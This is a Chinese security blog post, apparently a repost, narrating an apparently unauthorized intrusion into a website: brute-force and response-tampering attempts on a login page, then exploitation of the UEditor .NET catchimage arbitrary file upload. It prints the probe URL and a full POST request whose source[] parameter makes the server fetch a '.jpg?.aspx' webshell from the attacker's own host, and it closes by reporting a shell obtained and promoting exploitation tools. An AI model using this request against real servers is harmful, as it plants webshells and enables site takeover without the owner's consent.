实战 | 柳暗花明之UEditor编辑器任意文件上传

admin 2023年9月12日13:10:05评论30 views字数 1322阅读4分24秒阅读模式

免责声明

由于传播、利用本公众号琴音安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号琴音安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!


0X01前言

又是一个无聊的周末

抱着水洞的的心情,打开了站点

依旧是开端一个登录框

系统登录框有验证码,验证码验证后未失效更新 可尝试暴力破解

实战 | 柳暗花明之UEditor编辑器任意文件上传

实战 | 柳暗花明之UEditor编辑器任意文件上传

爆破没有出货

拦截响应包返回包,修改响应为正确,看看能不能绕过

实战 | 柳暗花明之UEditor编辑器任意文件上传


绕过也不行,果然运气不行

转折看看rad有没有爬到有用的结果,这不是百度编辑器么 心了乐呵呵 shell有了

实战 | 柳暗花明之UEditor编辑器任意文件上传

实战 | 柳暗花明之UEditor编辑器任意文件上传

先验证一下漏洞存不存在

UEditor/net/controller.ashx?action=catchimage

实战 | 柳暗花明之UEditor编辑器任意文件上传

返回{"state":"参数错误:没有指定抓取源"},可以继续尝试漏洞利用

在自己服务器上放一个后缀为.jpg的马子

POST /URL地址/UEditor/net/controller.ashx?action=catchimage HTTP/1.1Host: x.x.x.xUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9sec-ch-ua-platform: "Windows"sec-ch-ua: "Google Chrome";v="100", "Chromium";v="100", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 49
source[]=http://替换为服务器开启http服务的URL地址/111.jpg?.aspx

实战 | 柳暗花明之UEditor编辑器任意文件上传

实战 | 柳暗花明之UEditor编辑器任意文件上传

get shell成功

实战 | 柳暗花明之UEditor编辑器任意文件上传

下机 跑路

往期原创工具获取

后台回复"oa1.5"获取红蓝对抗重点OA系统漏洞利用工具1.5增强版
后台回复"天剑"获取天剑源码扫描工具
后台回复"未授权"可获取超级未授权检测工具
后台回复"工具箱1" 可获取单兵漏洞利用集成工具箱V1.0
后台回复"oa1.2" 可获取红蓝对抗重点OA系统漏洞利用工具1.2增强版
后台回复"编解码工具箱" 可获取加解密&编解码工具箱V1.0
后台回复"230707" 可获取综合IP反查工具
后台回复"20230614" 可获取springboot利用工具


免费资源分享圈

实战 | 柳暗花明之UEditor编辑器任意文件上传

原文始发于微信公众号(琴音安全):实战 | 柳暗花明之UEditor编辑器任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月12日13:10:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 柳暗花明之UEditor编辑器任意文件上传https://cn-sec.com/archives/2028766.html

发表评论

匿名网友 填写信息